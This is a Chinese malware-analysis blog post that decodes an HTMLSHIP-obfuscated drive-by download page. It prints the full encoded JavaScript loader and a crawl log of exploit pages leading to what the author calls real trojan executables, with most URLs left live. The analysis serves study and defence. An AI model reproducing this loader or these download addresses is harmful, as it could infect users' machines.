3月14日挂马分析报告

 这回专门讲解新型HTMLSHIP如何解密..

Begin:

1、hxxp://s.rdeg42.cn/03/google.htm

打开后,我们可以得到:

XML/HTML代码
  1. <hTmL><hEaD><Meta Name=Encoder Content=HTMLSHIP>  
  2. <META HTTP-EQUIV="Expires" CONTENT="-1"><META NAME="robots" CONTENT="noindex"><META HTTP-EQUIV="Pragma" CONTENT="no-cache"><META HTTP-EQUIV="imagetoolbar" CONTENT="no"><noscript><iframe></iframe></noscript><sCrIpT lAnGuAgE="jAvAsCrIpT"><!--  
  3. rA57=311;function gM0(hL78){nN64("%3B%66%6F%72%28%76%61%72%20%6C%4D%37%33%3D%30%3B%6C%4D%37%33%3C%31%36%3B%6C%4D%37%33%2B%2B%29%7B%76%61%72%20%72%65%31%3D%6E%65%77%20%52%65%67%45%78%70%28%64%58%38%32%2E%63%68%61%72%41%74%28%6C%4D%37%33%29%2C%5B%22%67%22%5D%29%3B%6B%47%31%30%3D%6B%47%31%30%2E%72%65%70%6C%61%63%65%28%72%65%31%2C%22%25%22%2B%72%52%36%37%2E%63%68%61%72%41%74%28%6C%4D%37%33%29%29%3B%76%61%72%20%72%65%32%3D%6E%65%77%20%52%65%67%45%78%70%28%64%58%38%32%2E%63%68%61%72%41%74%28%6C%4D%37%33%2B%31%36%29%2C%5B%22%67%22%5D%29%3B%6B%47%31%30%3D%6B%47%31%30%2E%72%65%70%6C%61%63%65%28%72%65%32%2C%22%25%75%22%2B%72%52%36%37%2E%63%68%61%72%41%74%28%6C%4D%37%33%29%29%3B%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%6B%47%31%30%29%29%3B")};gM0(0.5209838,eval(unescape("%62%4C%33%34%3D%38%37%37%35%3B%69%66%28%64%6F%63%75%6D%65%6E%74%2E%61%6C%6C%29%7B%66%75%6E%63%74%69%6F%6E%20%5F%64%6D%28%29%7B%72%65%74%75%72%6E%20%66%61%6C%73%65%7D%3B%66%75%6E%63%74%69%6F%6E%20%5F%6D%64%6D%28%29%7B%64%6F%63%75%6D%65%6E%74%2E%6F%6E%63%6F%6E%74%65%78%74%6D%65%6E%75%3D%5F%64%6D%3B%73%65%74%54%69%6D%65%6F%75%74%28%22%5F%6D%64%6D%28%29%22%2C%38%30%30%29%7D%3B%5F%6D%64%6D%28%29%3B%7D%64%6F%63%75%6D%65%6E%74%2E%6F%6E%63%6F%6E%74%65%78%74%6D%65%6E%75%3D%6E%65%77%20%46%75%6E%63%74%69%6F%6E%28%22%72%65%74%75%72%6E%20%66%61%6C%73%65%22%29%3B%66%75%6E%63%74%69%6F%6E%20%5F%6E%64%6D%28%65%29%7B%69%66%28%64%6F%63%75%6D%65%6E%74%2E%6C%61%79%65%72%73%7C%7C%77%69%6E%64%6F%77%2E%73%69%64%65%62%61%72%29%7B%69%66%28%65%2E%77%68%69%63%68%21%3D%31%29%72%65%74%75%72%6E%20%66%61%6C%73%65%3B%7D%7D%3B%69%66%28%64%6F%63%75%6D%65%6E%74%2E%6C%61%79%65%72%73%29%7B%64%6F%63%75%6D%65%6E%74%2E%63%61%70%74%75%72%65%45%76%65%6E%74%73%28%45%76%65%6E%74%2E%4D%4F%55%53%45%44%4F%57%4E%29%3B%64%6F%63%75%6D%65%6E%74%2E%6F%6E%6D%6F%75%73%65%64%6F%77%6E%3D%5F%6E%64%6D%3B%7D%65%6C%73%65%7B%64%6F%63%75%6D%65%6E%74%2E%6F%6E%6D%6F%75%73%65%75%70%3D%5F%6E%64%6D%3B%7D%3B%61%59%39%33%3D%39%39%31%38%3B%70%57%35%38%3D%33%39%31%39%3B%66%75%6E%63%74%69%6F%6E%20%5F%64%77%73%28%29%7B%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%20%3D%20%22%20%22%3B%73%65%74%54%69%6D%65%6F%75%74%28%22%5F%64%77%73%28%29%22%2C%31%30%30%29%3B%7D%3B%5F%64%77%73%28%29%3B%67%47%36%34%3D%36%37%37%37%3B%6D%4A%33%37%3D%37%33%34%37%3B%66%75%6E%63%74%69%6F%6E%20%5F%64%64%73%28%29%7B%69%66%28%64%6F%63%75%6D%65%6E%74%2E%61%6C%6C%29%7B%64%6F%63%75%6D%65%6E%74%2E%6F%6E%73%65%6C%65%63%74%73%74%61%72%74%3D%66%75%6E%63%74%69%6F%6E%20%28%29%7B%72%65%74%75%72%6E%20%66%61%6C%73%65%7D%3B%73%65%74%54%69%6D%65%6F%75%74%28%22%5F%64%64%73%28%29%22%2C%37%30%30%29%7D%7D%3B%5F%64%64%73%28%29%3B%75%52%38%38%3D%31%39%32%31%3B%6B%50%35%33%3D%35%39%32%33%3B%69%66%28%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%70%72%6F%74%6F%63%6F%6C%2E%69%6E%64%65%78%4F%66%28%22%66%69%6C%65%22%29%21%3D%2D%31%29%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%22%22%3B%72%45%36%37%3D%35%33%35%30%3B%78%48%34%31%3D%35%39%32%30%3B%66%75%6E%63%74%69%6F%6E%20%5F%6E%72%28%29%7B%72%65%74%75%72%6E%20%74%72%75%65%7D%6F%6E%65%72%72%6F%72%3D%5F%6E%72%3B%77%56%31%3D%37%30%36%32%3B%6C%53%36%36%3D%31%30%36%34%3B%66%75%6E%63%74%69%6F%6E%20%5F%64%70%62%28%29%7B%66%6F%72%28%69%3D%30%3B%69%3C%64%6F%63%75%6D%65%6E%74%2E%61%6C%6C%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%69%66%28%64%6F%63%75%6D%65%6E%74%2E%61%6C%6C%5B%69%5D%2E%73%74%79%6C%65%2E%76%69%73%69%62%69%6C%69%74%79%21%3D%22%68%69%64%64%65%6E%22%29%64%6F%63%75%6D%65%6E%74%2E%61%6C%6C%5B%69%5D%2E%73%74%79%6C%65%2E%76%69%73%69%62%69%6C%69%74%79%3D%22%68%69%64%64%65%6E%22%3B%7D%3B%77%69%6E%64%6F%77%2E%6F%6E%62%65%66%6F%72%65%70%72%69%6E%74%3D%5F%64%70%62%3B%63%44%37%31%3D%33%39%32%32%3B%69%47%34%35%3D%34%34%39%32%3B%78%59%31%33%3D%32%32%30%33%3B%6E%57%37%38%3D%36%32%30%35%3B%75%4D%39%32%3D%35%36%33%32%3B%74%45%34%38%3D%33%30%36%34%3B%73%52%38%3D%34%32%30%37%3B%69%50%37%33%3D%38%32%30%38%3B%66%4B%39%35%3D%34%32%30%34%3B%65%43%35%32%3D%31%36%33%36%3B%75%56%32%30%3D%39%33%34%38%3B%6A%54%38%35%3D%33%33%34%39%3B%71%49%39%39%3D%32%37%37%36%3B%3B%5F%6C%69%63%65%6E%73%65%64%5F%74%6F%5F%3D%22%68%75%79%75%66%65%6E%67%22%3B%6E%4E%36%34%3D%66%75%6E%63%74%69%6F%6E%28%73%29%7B%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%73%29%29%7D%3B%69%57%33%37%3D%33%31%36%33%3B")),0.9121885,nN64("%64%58%38%32%3D%22%4D%52%4C%74%53%58%76%4A%49%4F%51%6C%6A%48%6F%71%57%6E%72%6D%4B%78%68%73%54%69%70%50%56%6B%77%4E%22%3B%72%52%36%37%3D%22%30%31%32%33%34%35%36%37%38%39%41%42%43%44%45%46%22"),0.8430054,kG10="L2LBL2LBL2LBL2LBL2LBL2LBL2LBL2MDMAtCX3S3X2S9X0X4L0SCS1SES7X5S1S7S5tDL2vAv1J6v1J3v3J2v9J0J4L2tEMDMAJ7v9vEv4vFJ7LEvFvEv5J2J2vFJ2tDv6J5vEv3J4v9vFvEL8L9JBJ2v5J4J5J2vEL0J4J2J5v5tBJDMDMAv6J5vEv3J4v9vFvEL0v9vEv9J4L8L9JBv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5L8L9tBJDMDMAJ7v9vEv4vFJ7LEvFvEvCvFv1v4L0tDL0v9vEv9J4tBMDMAv9v6L8v4vFv3J5vDv5vEJ4LEv3vFvFvBv9v5LEv9vEv4v5J8SFv6L8L2J7J5v4v9J8v9v1vFJAv9tDL2L9tDtDLDt1L9MDMAJBMDMAJ6v1J2L0vBv2vBJ3tDL2vBv2J3J4v7L2tBMDMAJ6v1J2L0J3vBJ0v1vFJ0v1vFtDvEv5J7L0S4v1J4v5L8L9tBMDMAJ6v1J2L0v5J8J0v9J2v5J3tDvEv5J7L0S4v1J4v5L8L9tBMDMAv5J8J0v9J2v5J3LEJ3v5J4X4v9vDv5L8v5J8J0v9J2v5J3LEv7v5J4X4v9vDv5L8L9LBt2t4LAt6t0LAt6t0LAt1t0t0t0L9tBMDMAv4vFv3J5vDv5vEJ4LEv3vFvFvBv9v5tDL2J7J5v4v9J8v9v1vFJAv9tDX9v5J3tBJ0v1J4v8tDLFtBv5J8J0v9J2v5J3tDL2LBv5J8J0v9J2v5J3LEJ4vFS7SDX4X3J4J2v9vEv7L8L9tBMDMAv9v6L8vEv1J6v9v7v1J4vFJ2LEJ5J3v5J2S1v7v5vEJ4LEJ4vFSCvFJ7v5J2S3v1J3v5L8L9LEv9vEv4v5J8SFv6L8L2vDJ3v9v5L2L9tEt0L9MDMAJBMDMAv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5L8L7tCvFv2vAv5v3J4L0v3vCv1J3J3v9v4tDL2v3vCJ3v9v4tAv4t2t7v3v4v2L2LBL2t6v5LDv1v5t6v4LDt1t1v3v6LDt9t6v2t8LDt4t4t4t5t5t3t5t4t0t0t0t0L2L0v3vFv4v5v2v1J3v5tDL2v8J4J4J0tALFLFv4vFJ7vEvCvFv1v4LEvDv1v3J2vFvDv5v4v9v1LEv3vFvDLFJ0J5v2LFJ3v8vFv3vBJ7v1J6v5LFv3v1v2J3LFv6vCv1J3v8LFJ3J7v6vCv1J3v8LEv3v1v2L3J6v5J2J3v9vFvEtDt4LCt0LCt1t9LCt0L2L0J7v9v4J4v8tDL2t0L2L0v8v5v9v7v8J4tDL2t0L2L0v1vCv9v7vEtDL2vDv9v4v4vCv5L2tEL7L9tBMDMAv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5L8L7tCJ0v1J2v1vDL0vEv1vDv5tDL2v1vCvCvFJ7X3v3J2v9J0J4S1v3v3v5J3J3L2L0J6v1vCJ5v5tDL2J3v1vDv5S4vFvDv1v9vEL2LFtEL7L9tBMDMAMDMAv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5L8L7tCJ0v1J2v1vDL0vEv1vDv5tDL2vDvFJ6v9v5L2L0J6v1vCJ5v5tDL2v9v5LEJ3J7v6L2LFtEL7L9tBMDMAv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5L8L7tCJ0v1J2v1vDL0vEv1vDv5tDL2J1J5v1vCv9J4J9L2L0J6v1vCJ5v5tDL2v8v9v7v8L2LFtEL7L9tBMDMAv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5L8L7tCJ0v1J2v1vDL0vEv1vDv5tDL2v2v7v3vFvCvFJ2L2L0J6v1vCJ5v5tDL2L3v6v6v6v6v6v6L2LFtEL7L9tBMDMAv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5L8L7tCv5vDv2v5v4L0J3J2v3tDL2v9v5LEJ3J7v6L2LFtEL7L9tBMDMAv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5L8L7tCLFvFv2vAv5v3J4tEL7L9tBMDMAJDMDMAv5vCJ3v5MDMAJBMDMAv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5L8L2tCS5SDS2S5S4L0J3J2v3tDv6v6LEJ3J7v6L0J7v9v4J4v8tDt0L0v8v5v9v7v8J4tDt0tEL2L9tBMDMAJDMDMAv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5vCvEL8L2tCv9v6J2v1vDv5L0J3J2v3tDv1vCvCLEv8J4vDL0J7v9v4J4v8tDt1t0t0L0v8v5v9v7v8J4tDt0tEtCXCLFv9v6J2v1vDv5tEL2L9tBJDMDMAMDMAtCLFX3S3X2S9X0X4tEMDMAtCLFS2SFS4X9tEtCLFS8X4SDSCtE");//--></sCrIpT></hEaD><boDY><noscript><b><font color=red>这个页面需要Javascript支持的浏览器!!!  

代码部分:

JavaScript代码
  1. <!--   
  2. rA57=311;function gM0(hL78){nN64("%3B%66%6F%72%28%76%61%72%20%6C%4D%37%33%3D%30%3B%6C%4D%37%33%3C%31%36%3B%6C%4D%37%33%2B%2B%29%7B%76%61%72%20%72%65%31%3D%6E%65%77%20%52%65%67%45%78%70%28%64%58%38%32%2E%63%68%61%72%41%74%28%6C%4D%37%33%29%2C%5B%22%67%22%5D%29%3B%6B%47%31%30%3D%6B%47%31%30%2E%72%65%70%6C%61%63%65%28%72%65%31%2C%22%25%22%2B%72%52%36%37%2E%63%68%61%72%41%74%28%6C%4D%37%33%29%29%3B%76%61%72%20%72%65%32%3D%6E%65%77%20%52%65%67%45%78%70%28%64%58%38%32%2E%63%68%61%72%41%74%28%6C%4D%37%33%2B%31%36%29%2C%5B%22%67%22%5D%29%3B%6B%47%31%30%3D%6B%47%31%30%2E%72%65%70%6C%61%63%65%28%72%65%32%2C%22%25%75%22%2B%72%52%36%37%2E%63%68%61%72%41%74%28%6C%4D%37%33%29%29%3B%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%6B%47%31%30%29%29%3B")};gM0(0.5209838,eval(unescape("%62%4C%33%34%3D%38%37%37%35%3B%69%66%28%64%6F%63%75%6D%65%6E%74%2E%61%6C%6C%29%7B%66%75%6E%63%74%69%6F%6E%20%5F%64%6D%28%29%7B%72%65%74%75%72%6E%20%66%61%6C%73%65%7D%3B%66%75%6E%63%74%69%6F%6E%20%5F%6D%64%6D%28%29%7B%64%6F%63%75%6D%65%6E%74%2E%6F%6E%63%6F%6E%74%65%78%74%6D%65%6E%75%3D%5F%64%6D%3B%73%65%74%54%69%6D%65%6F%75%74%28%22%5F%6D%64%6D%28%29%22%2C%38%30%30%29%7D%3B%5F%6D%64%6D%28%29%3B%7D%64%6F%63%75%6D%65%6E%74%2E%6F%6E%63%6F%6E%74%65%78%74%6D%65%6E%75%3D%6E%65%77%20%46%75%6E%63%74%69%6F%6E%28%22%72%65%74%75%72%6E%20%66%61%6C%73%65%22%29%3B%66%75%6E%63%74%69%6F%6E%20%5F%6E%64%6D%28%65%29%7B%69%66%28%64%6F%63%75%6D%65%6E%74%2E%6C%61%79%65%72%73%7C%7C%77%69%6E%64%6F%77%2E%73%69%64%65%62%61%72%29%7B%69%66%28%65%2E%77%68%69%63%68%21%3D%31%29%72%65%74%75%72%6E%20%66%61%6C%73%65%3B%7D%7D%3B%69%66%28%64%6F%63%75%6D%65%6E%74%2E%6C%61%79%65%72%73%29%7B%64%6F%63%75%6D%65%6E%74%2E%63%61%70%74%75%72%65%45%76%65%6E%74%73%28%45%76%65%6E%74%2E%4D%4F%55%53%45%44%4F%57%4E%29%3B%64%6F%63%75%6D%65%6E%74%2E%6F%6E%6D%6F%75%73%65%64%6F%77%6E%3D%5F%6E%64%6D%3B%7D%65%6C%73%65%7B%64%6F%63%75%6D%65%6E%74%2E%6F%6E%6D%6F%75%73%65%75%70%3D%5F%6E%64%6D%3B%7D%3B%61%59%39%33%3D%39%39%31%38%3B%70%57%35%38%3D%33%39%31%39%3B%66%75%6E%63%74%69%6F%6E%20%5F%64%77%73%28%29%7B%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%20%3D%20%22%20%22%3B%73%65%74%54%69%6D%65%6F%75%74%28%22%5F%64%77%73%28%29%22%2C%31%30%30%29%3B%7D%3B%5F%64%77%73%28%29%3B%67%47%36%34%3D%36%37%37%37%3B%6D%4A%33%37%3D%37%33%34%37%3B%66%75%6E%63%74%69%6F%6E%20%5F%64%64%73%28%29%7B%69%66%28%64%6F%63%75%6D%65%6E%74%2E%61%6C%6C%29%7B%64%6F%63%75%6D%65%6E%74%2E%6F%6E%73%65%6C%65%63%74%73%74%61%72%74%3D%66%75%6E%63%74%69%6F%6E%20%28%29%7B%72%65%74%75%72%6E%20%66%61%6C%73%65%7D%3B%73%65%74%54%69%6D%65%6F%75%74%28%22%5F%64%64%73%28%29%22%2C%37%30%30%29%7D%7D%3B%5F%64%64%73%28%29%3B%75%52%38%38%3D%31%39%32%31%3B%6B%50%35%33%3D%35%39%32%33%3B%69%66%28%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%2E%70%72%6F%74%6F%63%6F%6C%2E%69%6E%64%65%78%4F%66%28%22%66%69%6C%65%22%29%21%3D%2D%31%29%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%22%22%3B%72%45%36%37%3D%35%33%35%30%3B%78%48%34%31%3D%35%39%32%30%3B%66%75%6E%63%74%69%6F%6E%20%5F%6E%72%28%29%7B%72%65%74%75%72%6E%20%74%72%75%65%7D%6F%6E%65%72%72%6F%72%3D%5F%6E%72%3B%77%56%31%3D%37%30%36%32%3B%6C%53%36%36%3D%31%30%36%34%3B%66%75%6E%63%74%69%6F%6E%20%5F%64%70%62%28%29%7B%66%6F%72%28%69%3D%30%3B%69%3C%64%6F%63%75%6D%65%6E%74%2E%61%6C%6C%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%69%66%28%64%6F%63%75%6D%65%6E%74%2E%61%6C%6C%5B%69%5D%2E%73%74%79%6C%65%2E%76%69%73%69%62%69%6C%69%74%79%21%3D%22%68%69%64%64%65%6E%22%29%64%6F%63%75%6D%65%6E%74%2E%61%6C%6C%5B%69%5D%2E%73%74%79%6C%65%2E%76%69%73%69%62%69%6C%69%74%79%3D%22%68%69%64%64%65%6E%22%3B%7D%3B%77%69%6E%64%6F%77%2E%6F%6E%62%65%66%6F%72%65%70%72%69%6E%74%3D%5F%64%70%62%3B%63%44%37%31%3D%33%39%32%32%3B%69%47%34%35%3D%34%34%39%32%3B%78%59%31%33%3D%32%32%30%33%3B%6E%57%37%38%3D%36%32%30%35%3B%75%4D%39%32%3D%35%36%33%32%3B%74%45%34%38%3D%33%30%36%34%3B%73%52%38%3D%34%32%30%37%3B%69%50%37%33%3D%38%32%30%38%3B%66%4B%39%35%3D%34%32%30%34%3B%65%43%35%32%3D%31%36%33%36%3B%75%56%32%30%3D%39%33%34%38%3B%6A%54%38%35%3D%33%33%34%39%3B%71%49%39%39%3D%32%37%37%36%3B%3B%5F%6C%69%63%65%6E%73%65%64%5F%74%6F%5F%3D%22%68%75%79%75%66%65%6E%67%22%3B%6E%4E%36%34%3D%66%75%6E%63%74%69%6F%6E%28%73%29%7B%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%73%29%29%7D%3B%69%57%33%37%3D%33%31%36%33%3B")),0.9121885,nN64("%64%58%38%32%3D%22%4D%52%4C%74%53%58%76%4A%49%4F%51%6C%6A%48%6F%71%57%6E%72%6D%4B%78%68%73%54%69%70%50%56%6B%77%4E%22%3B%72%52%36%37%3D%22%30%31%32%33%34%35%36%37%38%39%41%42%43%44%45%46%22"),0.8430054,kG10="L2LBL2LBL2LBL2LBL2LBL2LBL2LBL2MDMAtCX3S3X2S9X0X4L0SCS1SES7X5S1S7S5tDL2vAv1J6v1J3v3J2v9J0J4L2tEMDMAJ7v9vEv4vFJ7LEvFvEv5J2J2vFJ2tDv6J5vEv3J4v9vFvEL8L9JBJ2v5J4J5J2vEL0J4J2J5v5tBJDMDMAv6J5vEv3J4v9vFvEL0v9vEv9J4L8L9JBv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5L8L9tBJDMDMAJ7v9vEv4vFJ7LEvFvEvCvFv1v4L0tDL0v9vEv9J4tBMDMAv9v6L8v4vFv3J5vDv5vEJ4LEv3vFvFvBv9v5LEv9vEv4v5J8SFv6L8L2J7J5v4v9J8v9v1vFJAv9tDL2L9tDtDLDt1L9MDMAJBMDMAJ6v1J2L0vBv2vBJ3tDL2vBv2J3J4v7L2tBMDMAJ6v1J2L0J3vBJ0v1vFJ0v1vFtDvEv5J7L0S4v1J4v5L8L9tBMDMAJ6v1J2L0v5J8J0v9J2v5J3tDvEv5J7L0S4v1J4v5L8L9tBMDMAv5J8J0v9J2v5J3LEJ3v5J4X4v9vDv5L8v5J8J0v9J2v5J3LEv7v5J4X4v9vDv5L8L9LBt2t4LAt6t0LAt6t0LAt1t0t0t0L9tBMDMAv4vFv3J5vDv5vEJ4LEv3vFvFvBv9v5tDL2J7J5v4v9J8v9v1vFJAv9tDX9v5J3tBJ0v1J4v8tDLFtBv5J8J0v9J2v5J3tDL2LBv5J8J0v9J2v5J3LEJ4vFS7SDX4X3J4J2v9vEv7L8L9tBMDMAv9v6L8vEv1J6v9v7v1J4vFJ2LEJ5J3v5J2S1v7v5vEJ4LEJ4vFSCvFJ7v5J2S3v1J3v5L8L9LEv9vEv4v5J8SFv6L8L2vDJ3v9v5L2L9tEt0L9MDMAJBMDMAv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5L8L7tCvFv2vAv5v3J4L0v3vCv1J3J3v9v4tDL2v3vCJ3v9v4tAv4t2t7v3v4v2L2LBL2t6v5LDv1v5t6v4LDt1t1v3v6LDt9t6v2t8LDt4t4t4t5t5t3t5t4t0t0t0t0L2L0v3vFv4v5v2v1J3v5tDL2v8J4J4J0tALFLFv4vFJ7vEvCvFv1v4LEvDv1v3J2vFvDv5v4v9v1LEv3vFvDLFJ0J5v2LFJ3v8vFv3vBJ7v1J6v5LFv3v1v2J3LFv6vCv1J3v8LFJ3J7v6vCv1J3v8LEv3v1v2L3J6v5J2J3v9vFvEtDt4LCt0LCt1t9LCt0L2L0J7v9v4J4v8tDL2t0L2L0v8v5v9v7v8J4tDL2t0L2L0v1vCv9v7vEtDL2vDv9v4v4vCv5L2tEL7L9tBMDMAv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5L8L7tCJ0v1J2v1vDL0vEv1vDv5tDL2v1vCvCvFJ7X3v3J2v9J0J4S1v3v3v5J3J3L2L0J6v1vCJ5v5tDL2J3v1vDv5S4vFvDv1v9vEL2LFtEL7L9tBMDMAMDMAv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5L8L7tCJ0v1J2v1vDL0vEv1vDv5tDL2vDvFJ6v9v5L2L0J6v1vCJ5v5tDL2v9v5LEJ3J7v6L2LFtEL7L9tBMDMAv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5L8L7tCJ0v1J2v1vDL0vEv1vDv5tDL2J1J5v1vCv9J4J9L2L0J6v1vCJ5v5tDL2v8v9v7v8L2LFtEL7L9tBMDMAv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5L8L7tCJ0v1J2v1vDL0vEv1vDv5tDL2v2v7v3vFvCvFJ2L2L0J6v1vCJ5v5tDL2L3v6v6v6v6v6v6L2LFtEL7L9tBMDMAv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5L8L7tCv5vDv2v5v4L0J3J2v3tDL2v9v5LEJ3J7v6L2LFtEL7L9tBMDMAv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5L8L7tCLFvFv2vAv5v3J4tEL7L9tBMDMAJDMDMAv5vCJ3v5MDMAJBMDMAv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5L8L2tCS5SDS2S5S4L0J3J2v3tDv6v6LEJ3J7v6L0J7v9v4J4v8tDt0L0v8v5v9v7v8J4tDt0tEL2L9tBMDMAJDMDMAv4vFv3J5vDv5vEJ4LEJ7J2v9J4v5vCvEL8L2tCv9v6J2v1vDv5L0J3J2v3tDv1vCvCLEv8J4vDL0J7v9v4J4v8tDt1t0t0L0v8v5v9v7v8J4tDt0tEtCXCLFv9v6J2v1vDv5tEL2L9tBJDMDMAMDMAtCLFX3S3X2S9X0X4tEMDMAtCLFS2SFS4X9tEtCLFS8X4SDSCtE");//-->  

这个代码...号称神器的Malzilla无法解密

但是有人说,小g的在线解密可以解出

我试了,的确可以解出来,小g曾经说过,他这个的原理就是替换document.write

查看解密的原代码

可以发现一行

JavaScript代码
  1. function hook()   
  2. {   
  3.     hooks=document.write;   
  4.     document.write=function(s)   
  5.     {   
  6.         txt.value=s;   
  7.     }   
  8. }    
  9. hook();  

呃..但是为什么找不到document.write

先Unescape

然后仔细找找

你就可以看见document.write了..

不过此时不能直接修改为alert...

先还原为escape

然后将document.write,escape加密

这里提供一个加密escape脚本(X祥出品)

JS版本:

JavaScript代码
  1. <script>   
  2. var a="document.write"  
  3. var b='',c,num;   
  4. var hexStr = "0123456789ABCDEF";   
  5. var low,high;   
  6. for (c=0;c<a.length;c++)   
  7. {   
  8.   low=a.charCodeAt(c) % 16   
  9.   high = (a.charCodeAt(c) - low)/16;   
  10.   hex = "" + hexStr.charAt(high) + hexStr.charAt(low);   
  11.   b=b+'%' + hex   
  12. }   
  13.   
  14. alert(b)   
  15. </script>  

VBS版本(感谢X祥给高亮代码):

VBS代码
  1. <script language="vbscript">   
    dim a,i,e    
    a=
    "document.write"   
    for i=to len(a)    
     e=e & 
    "%" & hex(asc(mid(a,i,1)))    
    next    
    msgbox e    
    </script> 
  2.  

然后可得到:

Escape代码
  1. %64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65  

然后将alert escape,代码和上面那个escape脚本一样的,只是把document.write换成了alert

然后在HTML中找到%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65 

并替换成%61%6c%65%72%74(alert escape加密后的东西)

再到浏览器里解密即可...

PS:话说以前耗子曾经说过..X祥出品的东西...变量不是a就是b...今天真的得到证实了...

既然有人说我没完全解完...那就解吧..

关于:hxxp://s.rdeg42.cn/03/google.htm解密的日志(全体输出 -  41):

Level  0>http://s.rdeg42.cn/03/google.htm
Level  1>http://s.rdeg42.cn/03/ie.swf  ●
Level  2>http://s.rdeg42.cn/03/win%209,0,115,0i.swf  ●
Level  3>http://w1.fsdfe.com/01/l.exe  ●
Level  1>http://s.rdeg42.cn/03/ff.swf  ●
Level  2>http://s.rdeg42.cn/03/win%209,0,115,0f.swf  ●
Level  3>http://w1.fsdfe.com/01/l.exe  ●
Level  1>http://s.rdeg42.cn/03/all.htm
Level  2>http://s.rdeg42.cn/03/5.htm
Level  3>http://s.rdeg42.cn/03/5.js
Level  4>http://w1.fsdfe.com/01/l.exe  ●
Level  2>http://s.rdeg42.cn/03/0.htm
Level  3>http://w1.fsdfe.com/01/l1.exe  ●
Level  2>http://s.rdeg42.cn/03/4.htm
Level  3>http://s.rdeg42.cn/03/4.js
Level  4>http://w1.fsdfe.com/01/l.exe  ●
Level  2>http://s.rdeg42.cn/03/3.htm
Level  3>http://s.rdeg42.cn/03/3.js
Level  4>http://w1.fsdfe.com/01/l.exe  ●
Level  2>http://s.rdeg42.cn/03/2.htm
Level  2>http://s.rdeg42.cn/03/uu.htm
Level  3>http://s.rdeg42.cn/03/uu.txt
Level  2>http://s.rdeg42.cn/03/cx.htm
Level  3>http://w1.fsdfe.com/01/l.exe  ●
Level  2>http://s.rdeg42.cn/03/bf.htm
Level  3>http://w1.fsdfe.com/01/l.exe  ●
Level  2>http://s.rdeg42.cn/03/office.htm
Level  3>http://s.rdeg42.cn/03/office.js
Level  4>http://w1.fsdfe.com/01/l.exe  ●
Level  2>http://s.rdeg42.cn/03/s.htm
Level  3>http://w1.fsdfe.com/01/l.exe  ●
Level  2>http://s.rdeg42.cn/03/newlz.htm
Level  3>http://s.rdeg42.cn/03/lz.js
Level  4>http://w1.fsdfe.com/game3130/l.exe  ●
Level  2>http://s.rdeg42.cn/03/6.htm
Level  3>http://w1.fsdfe.com/01/l.exe  ●
Level  2>http://s.rdeg42.cn/03/b.htm
Level  3>http://w1.fsdfe.com/01/baidu.cab  ●
Level  2>http://s.rdeg42.cn/03/1.htm
Level  3>http://s.rdeg42.cn/03/1.js
Level  4>http://w1.fsdfe.com/01/l.exe  ●

Log by aarwwefdds(打点的均为真实木马地址,swf除外)

为何不留个言呢?

我要把我的最新文章显示在这!